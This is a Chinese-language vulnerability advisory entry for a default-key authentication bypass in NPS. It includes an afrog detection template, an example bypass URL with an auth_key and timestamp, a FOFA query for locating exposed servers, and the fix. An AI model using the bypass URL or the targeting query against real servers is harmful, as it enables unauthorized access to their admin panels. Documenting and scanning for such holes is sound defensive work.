nps-default-key: NPS default key

日期: 2025-08-01 | 影响软件: NPS default key | POC: 已公开

漏洞描述

nps在默认情况下，允许使用auth_key和timestamp两个参数即可绕过身份验证进入后台(密钥是基于当前时间的时间戳进行哈希计算生成的，只有20s的操作时间，到期之后可尝试生成新的auth_key和timestamp进行后续利用)，修复方式：将nps.conf中#auth_key=test注释去掉；重新编译，不要下载GitHub现成版本 fofa: body="NPS" || product="nps"；只有使用了默认key才可以尝试利用，利用示例：url后边直接访问Index/Index?auth_key=8796e03429632be8992af4e12c2ff69b&timestamp=1685545695

PoC代码[已公开]

id: nps-default-key

info:
  name: NPS default key
  author: li1u
  severity: critical
  verified: true
  description: |-
    nps在默认情况下，允许使用auth_key和timestamp两个参数即可绕过身份验证进入后台(密钥是基于当前时间的时间戳进行哈希计算生成的，只有20s的操作时间，到期之后可尝试生成新的auth_key和timestamp进行后续利用)，修复方式：将nps.conf中#auth_key=test注释去掉；重新编译，不要下载GitHub现成版本
    fofa: body="NPS" || product="nps"；只有使用了默认key才可以尝试利用，利用示例：url后边直接访问Index/Index?auth_key=8796e03429632be8992af4e12c2ff69b&timestamp=1685545695
  created: 2023/06/01
  tags: nps,defaultkey,fileread

rules:
  r1:
    request:
      method: GET
      path: /auth/getauthkey
    expression: response.status == 200 && response.body.bcontains(b'"5acabcf051cd55abca03d18294422e01"')
expression: r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/nps-default-key.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐